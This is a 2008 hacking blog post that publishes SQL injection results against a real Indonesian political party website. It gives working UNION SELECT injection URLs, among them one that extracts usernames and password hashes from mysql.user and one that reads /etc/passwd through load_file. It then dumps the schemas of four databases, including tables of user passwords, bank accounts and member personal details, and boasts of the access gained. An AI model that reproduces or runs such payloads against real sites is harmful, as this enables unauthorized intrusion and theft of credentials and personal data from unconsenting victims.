viperfx07 is here to blog about hacking, cracking, website, application, android, and many more.

Tuesday, October 14, 2008

[SQLi] http://golkar.go.id

5:43 PM Posted by viperfx07 No comments
Tool --> schemafuzz v5.0
Dump:
[+] URL:http://pusat.golkar.or.id/galeri_golkar.php?g_id=2+AND+1=2+UNION+SELECT+sqli,1,2,3--
[+] Evasion Used: "+" "--"
[+] 13:14:02
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: golkar_pusat
User: golkar_pusat@202.43.163.198
Version: 5.0.51a-3ubuntu5.1

[+] Do we have Access to MySQL Database: Yes <-- w00t w00t
[!] http://pusat.golkar.or.id/galeri_golkar.php?g_id=2+AND+1=2+UNION+SELECT+0,1,concat(user,0x3a,password),3+FROM+mysql.user--

[+] Do we have Access to Load_File: Yes <-- w00t w00t
[!] http://pusat.golkar.or.id/galeri_golkar.php?g_id=2+AND+1=2+UNION+SELECT+0,1,load_file(0x2f6574632f706173737764),3--

[-] [13:14:04]
[-] Total URL Requests 3
[-] Done


[+] URL:http://pusat.golkar.or.id/galeri_golkar.php?g_id=2+AND+1=2+UNION+SELECT+sqli,1,2,3--
[+] Evasion Used: "+" "--"
[+] 13:14:11
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: golkar_pusat
User: golkar_pusat@202.43.163.198
Version: 5.0.51a-3ubuntu5.1

[Database]: golkar_blog_ver2
[Table: Columns]
[0]wp_comments: comment_ID,comment_post_ID,comment_author,comment_author_email,comment_author_url,comment_author_IP,comment_date,comment_date_gmt,comment_content,comment_karma,comment_approved,comment_agent,comment_type,comment_parent,user_id
[1]wp_links: link_id,link_url,link_name,link_image,link_target,link_category,link_description,link_visible,link_owner,link_rating,link_updated,link_rel,link_notes,link_rss
[2]wp_options: option_id,blog_id,option_name,option_value,autoload
[3]wp_postmeta: meta_id,post_id,meta_key,meta_value
[4]wp_posts: ID,post_author,post_date,post_date_gmt,post_content,post_title,post_category,post_excerpt,post_status,comment_status,ping_status,post_password,post_name,to_ping,pinged,post_modified,post_modified_gmt,post_content_filtered,post_parent,guid,menu_order,post_type,post_mime_type,comment_count
[5]wp_term_relationships: object_id,term_taxonomy_id,term_order
[6]wp_term_taxonomy: term_taxonomy_id,term_id,taxonomy,description,parent,count
[7]wp_terms: term_id,name,slug,term_group
[8]wp_usermeta: umeta_id,user_id,meta_key,meta_value
[9]wp_users: ID,user_login,user_pass,user_nicename,user_email,user_url,user_registered,user_activation_key,user_status,display_name

[Database]: golkar_pusat
[Table: Columns]
[0]mos_banner: bid,cid,type,name,imptotal,impmade,clicks,imageurl,clickurl,date,showBanner,checked_out,checked_out_time,editor,custombannercode
[1]mos_bannerclient: cid,name,contact,email,extrainfo,checked_out,checked_out_time,editor
[2]mos_bannerfinish: bid,cid,type,name,impressions,clicks,imageurl,datestart,dateend
[3]mos_categories: id,parent_id,title,name,image,section,image_position,description,published,checked_out,checked_out_time,editor,ordering,access,count,params
[4]mos_components: id,name,link,menuid,parent,admin_menu_link,admin_menu_alt,option,ordering,admin_menu_img,iscore,params
[5]mos_contact_details: id,name,con_position,address,suburb,state,country,postcode,telephone,fax,misc,image,imagepos,email_to,default_con,published,checked_out,checked_out_time,ordering,params,user_id,catid,access
[6]mos_content: id,title,title_alias,introtext,fulltext,state,sectionid,mask,catid,created,created_by,created_by_alias,modified,modified_by,checked_out,checked_out_time,publish_up,publish_down,images,urls,attribs,version,parentid,ordering,metakey,metadesc,access,hits
[7]mos_content_frontpage: content_id,ordering
[8]mos_content_rating: content_id,rating_sum,rating_count,lastip
[9]mos_core_acl_aro: aro_id,section_value,value,order_value,name,hidden
[10]mos_core_acl_aro_groups: group_id,parent_id,name,lft,rgt
[11]mos_core_acl_aro_sections: section_id,value,order_value,name,hidden
[12]mos_core_acl_groups_aro_map: group_id,section_value,aro_id
[13]mos_core_log_items: time_stamp,item_table,item_id,hits
[14]mos_core_log_searches: search_term,hits
[15]mos_fc_bans: created,userid,banneduserid,roomid,ip
[16]mos_fc_bot: id,bot,name,value
[17]mos_fc_bots: id,botname
[18]mos_fc_connections: id,updated,created,userid,roomid,state,color,start,lang,ip,tzoffset
[19]mos_fc_conversationlog: bot,id,input,response,uid,enteredtime
[20]mos_fc_dstore: uid,name,value,enteredtime,id
[21]mos_fc_gmcache: id,bot,template,inputstarvals,thatstarvals,topicstarvals,patternmatched,inputmatched,combined
[22]mos_fc_gossip: bot,gossip,id
[23]mos_fc_ignors: created,userid,ignoreduserid
[24]mos_fc_messages: id,created,toconnid,touserid,toroomid,command,userid,roomid,txt
[25]mos_fc_patterns: bot,id,word,ordera,parent,isend
[26]mos_fc_rooms: id,updated,created,name,password,ispublic,ispermanent
[27]mos_fc_templates: bot,id,template,pattern,that,topic
[28]mos_fc_thatindex: uid,enteredtime,id
[29]mos_fc_thatstack: thatid,id,value,enteredtime
[30]mos_feedback: id,tanggal,ip,status,nama,email,jeniskelamin,pekerjaan,umur,kota,negara,menu,jawaban,komentar
[31]mos_galeri: id,jenis,tanggal,acara,gambarlores,gambarhires
[32]mos_groups: id,name
[33]mos_komentar: id,cid,nama,email,komentar,status,tanggal
[34]mos_mambots: id,name,element,folder,access,ordering,published,iscore,client_id,checked_out,checked_out_time,params
[35]mos_menu: id,menutype,name,link,type,published,parent,componentid,sublevel,ordering,checked_out,checked_out_time,pollid,browserNav,access,utaccess,params
[36]mos_messages: message_id,user_id_from,user_id_to,folder_id,date_time,state,priority,subject,message
[37]mos_messages_cfg: user_id,cfg_name,cfg_value
[38]mos_modules: id,title,content,ordering,position,checked_out,checked_out_time,published,module,numnews,access,showtitle,params,iscore,client_id
[39]mos_modules_menu: moduleid,menuid
[40]mos_newsfeeds: catid,id,name,link,filename,published,numarticles,cache_time,checked_out,checked_out_time,ordering
[41]mos_poll_data: id,pollid,text,hits
[42]mos_poll_date: id,date,vote_id,poll_id
[43]mos_poll_menu: pollid,menuid
[44]mos_polls: id,title,voters,checked_out,checked_out_time,published,access,lag
[45]mos_sb_attachments: mesid,filelocation
[46]mos_sb_categories: id,parent,name,cat_emoticon,locked,alert_admin,moderated,moderators,pub_access,pub_recurse,admin_access,admin_recurse,ordering,future2,published,checked_out,checked_out_time,review,hits,description
[47]mos_sb_messages: id,parent,thread,catid,name,userid,email,subject,time,ip,topic_emoticon,locked,hold,ordering,hits,moved
[48]mos_sb_messages_text: mesid,message
[49]mos_sb_moderation: catid,userid,future1,future2
[50]mos_sb_sessions: userid,allowed,lasttime,readtopics
[51]mos_sb_smileys: id,code,location,greylocation,emoticonbar
[52]mos_sb_subscriptions: thread,userid,future1
[53]mos_sb_users: userid,view,signature,moderator,ordering,posts,avatar,karma,karma_time
[54]mos_sections: id,title,name,image,scope,image_position,description,published,checked_out,checked_out_time,ordering,access,count,params
[55]mos_session: username,time,session_id,guest,userid,usertype,gid
[56]mos_shoutit: id,name,userid,shout_msg,published,shout_time,shout_ip
[57]mos_stats_agents: agent,type,hits
[58]mos_suara_anda_content: kodeSuaraAndaContent,judul,isi,tanggal,status
[59]mos_suara_anda_feedback: kodeSuaraAndaFeedback,kodeSuaraAndaContent,tanggal,nama,email,kota,negara,suaranya,status
[60]mos_template_positions: id,position,description
[61]mos_templates_menu: template,menuid,client_id
[62]mos_users: id,name,username,email,password,usertype,block,sendEmail,gid,registerDate,lastvisitDate,activation,params
[63]mos_usertypes: id,name,mask
[64]mos_weblinks: id,catid,sid,title,url,description,date,hits,published,checked_out,checked_out_time,ordering,archived,approved,params
[65]pendaftaran: kodePendaftaran,nama,no_anggota,alamat,no_telp,no_hp,no_fax,email,password,tanggalDaftar,tanggalValidasi,valid_email,admin_check

[Database]: ibs
[Table: Columns]
[0]allregmember: id,idmember,nama,tanggallahir,jeniskelamin,telp,hp,fax,alamat,kota,negara,kodepos,email,pekerjaan,namaperusahaan,gereja,bank,norek,tanggaljoin,point,status,username,pass
[1]bank: id,nama,cabang,norek,atasnama,status
[2]banner: id,nama,url,gambar,ukuran,status,jumlahklik
[3]belanjaanasli: id,idpembeli,goodsid,jumlah,kado,kertaskado,harga
[4]belanjaantemp: id,idpembeli,goodsid,jumlah,kado,kertaskado,harga
[5]berita: id,judul,sumber,deskripsi,isi,gambar,tanggal,status
[6]faktur: nomer
[7]inventoryweb: idinv,goodscode,title,description,detail,image,image2,image3,image4,harga,diskon,staonstore,stapromosi,stabestseller,stagift,kategori,subkategori,subsubkategori,pengarang,penerbit,berat,halaman,dimensi
[8]kategoriproduk: id,nama
[9]kertaskado: id,nama,gambar,status
[10]kesaksian: id,judul,sumber,deskripsi,isi,gambar,tanggal,status
[11]komentarberita: id,idberita,nama,judul,komentar,tanggal,status
[12]lyrics: idlyric,judul,penyanyi,lyrics
[13]mainmember: username,idmember,pass
[14]members: id,username,password,email,nama,alamat,kota,propinsi,kodepos,negara,status
[15]pembelitemp: id,sessio
[16]regmember: id,idmember,nama,tanggallahir,jeniskelamin,telp,hp,fax,alamat,kota,negara,kodepos,email,pekerjaan,namaperusahaan,gereja,bank,norek,tanggaljoin,point,status
[17]reviewproduk: id,idproduk,nama,email,judul,komentar,tanggal,status
[18]subkategoriproduk: id,kategori,nama
[19]subsubkategoriproduk: id,kategori,subkategori,nama
[20]tarif: id,kota,ekspedisi,perkilo,hari,status
[21]transaksi: id,nama,email,alamat,kodepos,kota,telepon,hp,metode,uangpecahan,kembalian,bank,norek,atasnama,tanggal,sessio,faktur,status,totalnya,konfirmasi
[22]users3: username,password

[Database]: mysql
[Table: Columns]
[0]columns_priv: Host,Db,User,Table_name,Column_name,Timestamp,Column_priv
[1]db: Host,Db,User,Select_priv,Insert_priv,Update_priv,Delete_priv,Create_priv,Drop_priv,Grant_priv,References_priv,Index_priv,Alter_priv,Create_tmp_table_priv,Lock_tables_priv,Create_view_priv,Show_view_priv,Create_routine_priv,Alter_routine_priv,Execute_priv
[2]func: name,ret,dl,type
[3]help_category: help_category_id,name,parent_category_id,url
[4]help_keyword: help_keyword_id,name
[5]help_relation: help_topic_id,help_keyword_id
[6]help_topic: help_topic_id,name,help_category_id,description,example,url
[7]host: Host,Db,Select_priv,Insert_priv,Update_priv,Delete_priv,Create_priv,Drop_priv,Grant_priv,References_priv,Index_priv,Alter_priv,Create_tmp_table_priv,Lock_tables_priv,Create_view_priv,Show_view_priv,Create_routine_priv,Alter_routine_priv,Execute_priv
[8]proc: db,name,type,specific_name,language,sql_data_access,is_deterministic,security_type,param_list,returns,body,definer,created,modified,sql_mode,comment
[9]procs_priv: Host,Db,User,Routine_name,Routine_type,Grantor,Proc_priv,Timestamp
[10]tables_priv: Host,Db,User,Table_name,Grantor,Timestamp,Table_priv,Column_priv
[11]time_zone: Time_zone_id,Use_leap_seconds
[12]time_zone_leap_second: Transition_time,Correction
[13]time_zone_name: Name,Time_zone_id
[14]time_zone_transition: Time_zone_id,Transition_time,Transition_type_id
[15]time_zone_transition_type: Time_zone_id,Transition_type_id,Offset,Is_DST,Abbreviation
[16]user: Host,User,Password,Select_priv,Insert_priv,Update_priv,Delete_priv,Create_priv,Drop_priv,Reload_priv,Shutdown_priv,Process_priv,File_priv,Grant_priv,References_priv,Index_priv,Alter_priv,Show_db_priv,Super_priv,Create_tmp_table_priv,Lock_tables_priv,Execute_priv,Repl_slave_priv,Repl_client_priv,Create_view_priv,Show_view_priv,Create_routine_priv,Alter_routine_priv,Create_user_priv,ssl_type,ssl_cipher,x509_issuer,x509_subject,max_questions,max_updates,max_connections,max_user_connections

[-] [13:24:06]
[-] Total URL Requests 926
[-] Done

0 comments:

Post a Comment